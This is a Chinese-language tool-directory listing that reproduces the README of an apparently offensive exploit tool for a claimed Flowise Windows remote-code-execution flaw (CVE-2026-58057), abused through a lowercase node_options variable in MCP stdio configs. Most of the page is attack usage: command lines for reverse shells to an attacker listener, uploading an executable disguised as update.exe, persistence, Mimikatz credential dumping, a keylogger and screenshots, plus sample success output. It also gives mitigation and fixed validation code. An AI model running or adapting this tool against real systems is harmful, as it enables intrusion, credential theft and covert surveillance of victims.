Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Flowise-CVE-2026-58057-exploit — 针对 CVE-2026-58057 的 Flowise Windows RCE 漏洞利用程序。通过大小写敏感缺陷绕过环境变量验证。利用 node_options 通过 MCP stdio 注入任意代码。支持反弹 Shell、持久化、文件上传、凭据转储。仅限授权安全测试使用。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
持久化机制漏洞分析漏洞利用Web应用程序漏洞利用信息收集后渗透利用渗透测试命令与控制红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

针对 CVE-2026-58057 的 Flowise Windows RCE 漏洞利用程序。通过大小写敏感缺陷绕过环境变量验证。利用 node_options 通过 MCP stdio 注入任意代码。支持反弹 Shell、持久化、文件上传、凭据转储。仅限授权安全测试使用。

查看仓库
128天前尚未审核

Flowise CVE-2026-58057 - Windows 远程代码执行漏洞利用

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 概述

这是一个针对 CVE-2026-58057 的生产级漏洞利用工具,该漏洞是 Flowise 在 Windows 平台上的一个严重远程代码执行漏洞。该漏洞源于区分大小写的环境变量校验,无法拦截小写形式的 node_options,从而使攻击者能够绕过 NODE_OPTIONS 黑名单,并通过自定义 MCP stdio 配置执行任意代码。

该漏洞利用程序展示了专业的软件工程实践,具备模块化架构、全面的错误处理以及多种载荷类型支持。

f1

f2

⚠️ 免责声明

重要提示: 本工具仅用于授权的安全测试、渗透测试和教育目的。作者对因使用本软件而导致的任何滥用或损害概不负责。在测试任何系统之前,请务必获得适当授权。

🔍 技术细节

漏洞根因

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

漏洞利用机制

  1. 攻击者向 Flowise 进行身份认证

  2. 创建/修改自定义 MCP stdio 节点

  3. 注入小写形式的 node_options 环境变量

  4. 将值设置为 --require malicious-loader.js

  5. Node.js 在 MCP stdio 运行时执行加载器

  6. 实现任意代码执行

✨ 功能特性

核心能力

  • ✅ 反向 Shell - 回连到攻击者机器

  • ✅ 绑定 Shell - 在目标上打开监听端口

  • ✅ 命令执行 - 运行任意系统命令

  • ✅ 文件上传 - 向目标系统上传文件

  • ✅ 持久化 - 多种持久化机制

  • ✅ 信息收集 - 收集系统情报

  • ✅ 凭据转储 - 集成 Mimikatz

  • ✅ 屏幕截图 - 捕获桌面截图

  • ✅ 键盘记录器 - 安装键盘记录功能

技术特性

  • 🔐 多种身份认证方式 - API 密钥或用户名/密码

  • 🔄 自动重试逻辑 - 对网络问题具有韧性

  • 🧹 自清理 - 从目标处删除加载器文件

  • 🌐 跨平台 - 支持 Windows/Linux/macOS

  • 🎨 彩色输出 - 增强可读性

  • 📊 详细调试 - 提供详细的故障排查日志

📦 安装

前提条件

  • Python 3.6 或更高版本

  • pip(Python 包管理器)

快速安装

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Docker 安装(可选)

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 使用方法

命令行选项

root@kitploit:~
python3 exploit.py --help

身份认证选项

载荷选项

执行选项

选项描述
--interactive启动交互式 Shell
--verbose启用调试输出
--timeout请求超时时间(秒)
--retries

📝 使用示例

1. 基础反向 Shell

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. 交互式反向 Shell

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. 命令执行

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. 文件上传

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. 凭据转储(Mimikatz)

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. 持久化安装

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. 信息收集

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. 屏幕截图

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 载荷类型

🛡️ 缓解措施

升级 Flowise

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

临时规避措施

  • 限制对自定义 MCP 配置的访问

  • 实施网络分段

  • 监控可疑的环境变量

  • 使用 Web 应用防火墙(WAF)

修复后的代码

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 输出示例

成功的漏洞利用输出

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

详细模式

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 故障排除

常见问题

调试命令

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 文件结构

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Main exploit script
├── requirements.txt    # Core dependencies
├── README.md          # This documentation
├── LICENSE            # MIT License
└── CHANGELOG.md       # Version history

🤝 贡献指南

  1. 复制(Fork)该仓库

  2. 创建功能分支(git checkout -b feature/amazing)

  3. 提交更改(git commit -m 'Add amazing feature')

  4. 推送到分支(git push origin feature/amazing)

  5. 开启 Pull Request

📜 许可证

本项目基于 MIT 许可证授权 - 详情请参阅 LICENSE 文件。

🏆 致谢

  • 感谢 FlowiseAI 提供的产品

  • 感谢发现类似漏洞的安全研究人员

  • 感谢渗透测试社区提供的测试方法

🔗 参考链接

  • CVE-2026-58057

  • Flowise GitHub 仓库

  • Flowise 文档

  • Node.js 环境变量安全

📧 联系方式

作者: Sudeepa Wanigarathna 安全研究员与渗透测试人员

⭐ 支持

如果你觉得这个工具对你有用,请考虑:

  • ⭐ 在 GitHub 上为仓库点星

  • 🔔 关注以获取更新

  • 📝 提交问题或建议


用 ❤️ 为安全社区制作

下载工具
选项描述示例
-t, --targetFlowise URL(必需)http://localhost:3000
-k, --api-keyFlowise API 密钥flowise_abc123...
-u, --username用户名admin
-p, --password密码password123
选项描述示例
--payload载荷类型reverse_shell
--lhost监听主机192.168.1.100
--lport监听端口4444
--command要执行的命令whoami
--local-file要上传的文件payload.exe
--remote-path远程保存路径C:\\Temp\\update.exe
重试次数
载荷描述参数
reverse_shell回连到监听器--lhost, --lport
bind_shell打开监听端口--lport
command_exec执行命令--command
file_upload上传文件到目标--local-file, --remote-path
persistence安装持久化无
info_gather收集系统信息无
mimikatz转储凭据无
screenshot捕获屏幕截图无
keylogger安装键盘记录器无
问题解决方案
SSL 证书错误pip install --trusted-host pypi.org -r requirements.txt
权限被拒绝pip install --user -r requirements.txt
连接被拒绝检查目标 URL 和网络连接
身份认证失败检查 API 密钥或用户名/密码
载荷执行失败使用 --verbose 进行详细调试
Python 版本确保已安装 Python 3.6+